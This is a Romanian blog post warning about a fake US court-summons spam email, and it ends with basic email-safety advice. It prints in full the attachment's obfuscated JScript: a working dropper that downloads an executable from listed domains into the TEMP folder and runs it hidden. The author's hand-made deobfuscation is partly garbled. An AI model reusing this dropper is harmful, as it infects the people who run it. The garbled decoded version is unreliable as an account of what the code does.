„Ai probleme cu legea”, sau cum vrea spamul sa te duci la tribunal

Toată lumea știe ce e ăla spam și toată lumea primește zeci de mesaje de astea. De la deja celebra „scrisoare nigeriană” la oferte de vânzare pentru produse diverse (Viagra, papuci, peruci, sex, etc. etc.), spamul a devenit parte din viața noastră online. Eu personal m-am învățat cu el demult (bine, nici n-ai cum altfel). Din când în când mă mai uit prin mesaje să văd ce-au mai inventat ăștia, așa, de fantezie, când n-am ce face...
Zilele trecute am primit o „înștiințare” că tre' să mă prezint pe la nu-ș`ce tribunal. Cică venea din partea unui avocat sau ceva de genul ăsta, un funcționar de pe la tribunal. Toate bune și frumoase, doar că tribunalul e prin SUA și eu n-am călcat în viața mea pe acolo, n-am nicio legătură, rudă sau urmași pe acolo...  Uite și poze, cu link-ul care numai de la tribunal nu e...

< /br>
< /br>
< /br>

Cum așteptam pe nea digikam să termine de indexat pozele, am zis să arunc o privire prin „documentele” trimise de la `tribunal. Și  documentul ăla care este un fișier.js (JavaScript ) arată cam așa:

var w35='= ws.',o75='var ',p95='ws = ',g89='L2.X',s87='36595',o9='r/',h5=' ren',t20='ld ',q34=' = ',b58=' fals',f76='om',z46='EMP',e92='leis',j70='/"+b[',y35='var',u56='0; ',a55='Ob',i89='DB.S',t8='eag',g66='0; fo',d54='e()',j86='na.c',d83='d=',g56='7"',s46='f (xo',a41='nment',y14='y {',a40=' dn =',l19='am',k90='pt',e80='ize >',v40='coci',s58='rC',g43='(f',n33=' oku',g60=' tr',j16='ateO',b56='birl',r5='+"/co',x50='=1; ',t11='.com',w52='ar ',s2='Scr',o78='esp',c81='rings',p72='%")',a68='dn = ',f9='(92)',v9='eval',q90='XM',n89=' { }',a25='0) {',e70='e",1',f58='++) ',s57='omCha',o79='se',h19='{ xo',z54='try ',f25='if ',j11='ch ',o83='= W',o31=this,e5='var ',x69=' 1; ',k48='ateOb',z39='dy)',d42=' = ',e28='e-',w98='nl',d61='e"',s97='le',y11='fn ',s15=',0)',g50='o.r',a15='("MS',u79=' v',v27='; xa.',i5='.s',m78='rite',n86='xo',c10='tat',b73='om ro',f3='(e',h80='++) {',l93='; }',h11='.open',b65='m"',m46=' var ',v44='m"',v12='"htt',g42='trea',m40='2"+n,',b70='dEn',b41=') { ',q74='("%T',o38=' { };',w74='0) {',n71='P");',r37='sa',z17='xa.',d4='t.Cre',m64='); va',c20='= 0',m2='&rn',d28=' n',d84='Expan',a73='=3; n',m90='.s',h39='39529',z27='un(fn',c36='".ex',r54='us ',s7='");',y34='i]',n70='ks.co',w67='xa ',t28='jec',h84=' 100',w5=',2);',a22='ode',a86='er)',x5='ring.',n39='p:/',h22='?id=555D505E120805003B1405120508241D050C0B0B4A070B095E275E0301110A01170D174A070B095E17515E555051535156545154535E55',o74='ng',y67='File',y84='ip',u41='l-ai',t25=o31[v9],o15=o75+'b = '+'"k'+'aref'+'il'+t11+n33+u41+e92+b56+'igi.c'+'om '+l19+'erica'+w98+t8+'ue'+'be'+'tting'+'.c'+b73+'bot-d'+e28+v40+j86+f76+h5+n70+v44+'.sp'+'lit("'+' ")'+'; '+e5+p95+'WScri'+k90+'.C'+'reate'+a55+'ject('+'"WScr'+'ipt.S'+'hell'+s7+' var '+y11+w35+d84+b70+'viro'+a41+'St'+c81+q74+z46+p72+'+St'+x5+'fr'+s57+s58+a22+f9+'+"'+s87+g56+'; '+y35+' xo'+d42+'WScr'+'ipt'+'.Cre'+j16+'bject'+a15+q90+g89+'MLH'+'TT'+n71+m46+w67+o83+s2+y84+d4+k48+t28+'t('+'"A'+'DO'+i89+g42+b65+m64+'r ld'+q34+g66+'r (v'+'ar'+d28+x50+'n<'+a73+f58+'{ for'+' ('+'var'+' i=ld'+'; i<'+'b.'+s97+o74+'th; i'+h80+u79+w52+a68+u56+z54+h19+'.ope'+'n("G'+'ET",'+v12+n39+j70+y34+r5+'un'+'te'+o9+h22+m2+d83+h39+m40+b58+'e); '+n86+'.s'+'end'+'(); i'+s46+m90+c10+r54+'== 20'+a25+' xa'+h11+'(); x'+'a.ty'+'pe'+' ='+' 1; '+'xa'+'.w'+m78+'(x'+g50+o78+'on'+o79+'Bo'+z39+'; '+'if '+'(xa'+i5+e80+h84+w74+a40+x69+z17+'posi'+'tion '+c20+v27+r37+'veTo'+y67+g43+'n+'+'n+'+'".ex'+d61+w5+g60+y14+' ws.R'+z27+'+n+'+c36+e70+s15+'; } '+'cat'+j11+f3+'r)'+n89+'; '+'}; xa'+'.clos'+d54+'; }; '+f25+'(dn ='+'= 1'+b41+t20+'= i;'+' br'+'eak'+l93+'; }'+' cat'+'ch ('+a86+o38+' }; '+'};';t25(o15);

Ciudat, nu? Deși sunt total afon la programare, dar bunișor la limba engleză, am ginit pe acolo niște chestii ciudate (îngroșate în text) și niște funcții sau cum se cheamă ele (var, for, if) folosite în diverse limbaje de programare. M-am jucat puțin cu înlocuirea variabilelor alea din text și a ieșit asta:

a ref''.com okul-aileisbirligiigi.com american league betting.com robot-de-cocina.com
renks.com.split(" "); var ws = WScript.CreateObject("WScript.Shell"); var fn=
ws.ExpandEnvironment
Strings ("%TEMP%")+StringfromCharCode(92) 365957; var  xo = WScript.CreateObject("MSXML2.XML HTTP'
var xa = WScript.CreateObject("ADODB.Stream);  var ld = 0; for (var n=1;n<=3; n++){ for (var i=ld;
i<b.length; i++) { var dn =0 try{
xo.open(GET http://counter/?id=555D505E120805003B1405120508241D050C0B0B4A070B095E275E0301110A01170D174A070B095E17515E555051535156545154535E55&rnd=395292",false);
xo.send();
if (xo.status== 200) {xa.open(); xa.type = 1; xa.write(xo.responseBody;
if (xa.size 1000) { dn = 1 xa.position = 0 ; xa.saveToFile (fn.exe ,2);  try {ws.Run(fn.exe,0)+; } catcher{ }; };
xa.close(); };  if (dn == 1) { ld = i; break; } catcher { };}; };[v9](varb = k);

Nu este 100% corect, sunt sigur, dar ne putem face o idee de ce va să zică o „citație”, nu? Habar n-are ce anume face scriptul de mai sus, se poate discuta pe marginea lui, dar nu știu de ce nu face nimic bun pentru noi.
Iar pentru cei care sunt mai naivi din fire și/sau mai nepricepuți în ale parșivității umane dublate de tehnologia utilizată în scopuri rele, scriptul de mai sus poate avea consecințe grave. Sau, să zicem că îl ajutăm pe nea Caisă ăla să parieze sau să câștige la pariuri, din ce se vede... Hmmm... oare asta chiar ar fi 100% legal sau corect?

Concluzia? De fapt sunt mai multe.
1. Nu deschideți mailuri sau atașamente de la persoane necunoscute/expeditori necunoscuți, indiferent ce spune în ele.

2. Dacă primiți un mail bizar de la o cunoștință din agendă, verificați înainte dacă e chiar trimis de respectiva persoană și care-i motivul. NU de alta, dar circulă niște viruși informatici pe lumea asta... din ce în ce mai perverși.

3. Folosiți un antivirus bun. Scanați mesajele/atașamentele, chiar dacă sunt de la persoane cunoscute.

4. Familiarizați-vă puțin cu noțiunile-cheie din domeniul ăsta. la urma urmei, zicala aia cu „cea mai mare gaură de securitate este între scaun și tastatură” e cam adevărată... Puteți învăța de bună voie sau siliți de împrejurări. Eu vă doresc s-aveți parte doar de prima variantă. (În exemplul de mai sus, atașamentul conține și sintagma „.doc”, extensie specifică fișierelor Word. Dar nu este chiar un fișier Word, extensia reală este .js.